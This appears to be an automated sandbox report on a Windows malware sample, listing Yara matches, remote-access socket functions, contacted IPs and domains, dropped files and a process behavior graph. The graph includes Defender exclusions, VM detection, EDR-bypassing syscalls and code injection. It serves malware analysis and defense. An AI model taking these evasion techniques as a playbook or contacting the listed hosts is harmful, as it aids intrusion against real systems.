Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008E92C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,8_2_008E92C4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008D8C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,8_2_008D8C10
[MITRE ATT&CK matrix omitted: the report's interactive matrix, with tactic columns Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration and Impact, was flattened in extraction and the mapping of technique cells and hit counts to tactics is not recoverable from the text.]

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1656296
                    Sample: SecuriteInfo.com.Win32.Malw...
                    Startdate: 04/04/2025
                    Architecture: WINDOWS
                    Score: 100

                    • Start
                      • DNS/IP: grabify.link
                      • DNS/IP: edge.geo.kaspersky.com
                      • DNS/IP: devbuilds.s.kaspersky-labs.com
                      • Signature: Suricata IDS alerts for network traffic
                      • Signature: Found malware configuration
                      • Signature: Malicious sample detected (through community Yara rule)
                      • Signature: 10 other signatures
                      • Process started: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe [3 1]
                        • Signature: Query firmware table information (likely to detect VMs)
                        • Signature: Contains functionality to inject code into remote processes
                        • Signature: Adds a directory exclusion to Windows Defender
                        • Signature: 4 other signatures
                        • Process started: svchost.exe [3 7]
                          • DNS/IP: 82.29.67.160, 443, 49688, 49690 NTLGB United Kingdom
                          • DNS/IP: grabify.link 104.26.8.202, 443, 49689, 49691 CLOUDFLARENETUS United States
                          • DNS/IP: 107.174.192.179, 49687, 80 AS-COLOCROSSINGUS United States
                          • Dropped: C:\Users\user\AppData\Local\...\w32tm.exe, PE32+
                          • Dropped: C:\ProgramData\...\tzutil.exe, PE32+
                          • Dropped: C:\Users\user\AppData\Local\Temp\...\set.bat, PNG
                          • Signature: Benign windows process drops PE files
                          • Signature: Creates autostart registry keys with suspicious names
                          • Signature: Deletes itself after installation
                          • Signature: Searches for specific processes (likely to inject)
                          • Process started: tzutil.exe [7 4]
                            • DNS/IP: 104.168.28.10, 49701, 49704, 49707 AS-COLOCROSSINGUS United States
                            • DNS/IP: 127.0.0.1 unknown unknown
                            • Dropped: C:\Windows\Temp\bS4Vs_8188.sys, PE32+
                            • Signature: Multi AV Scanner detection for dropped file
                            • Signature: Query firmware table information (likely to detect VMs)
                            • Signature: Adds a directory exclusion to Windows Defender
                            • Signature: Sample is not signed and drops a device driver
                            • Process started: powershell.exe [23]
                              • Signature: Loading BitLocker PowerShell Module
                              • Process started: conhost.exe
                            • Process started: powershell.exe [23]
                              • Process started: conhost.exe
                          • Process started: w32tm.exe [6]
                            • DNS/IP: edge.geo.kaspersky.com 4.28.136.57, 443, 49731, 49736 LEVEL3US United States
                            • Signature: Creates HTML files with .exe extension (expired dropper behavior)
                            • Signature: Tries to evade analysis by execution special instruction (VM detection)
                            • Signature: Found direct / indirect Syscall (likely to bypass EDR)
                          • Process started: cmd.exe [1]
                            • Process started: conhost.exe
                        • Process started: cmd.exe [1]
                          • Signature: Adds a directory exclusion to Windows Defender
                          • Process started: powershell.exe [23]
                            • Signature: Loading BitLocker PowerShell Module
                          • Process started: conhost.exe

                    (Bracketed numbers after a process name are the graph's per-process counts of created registry values and created files, as listed in the legend.)
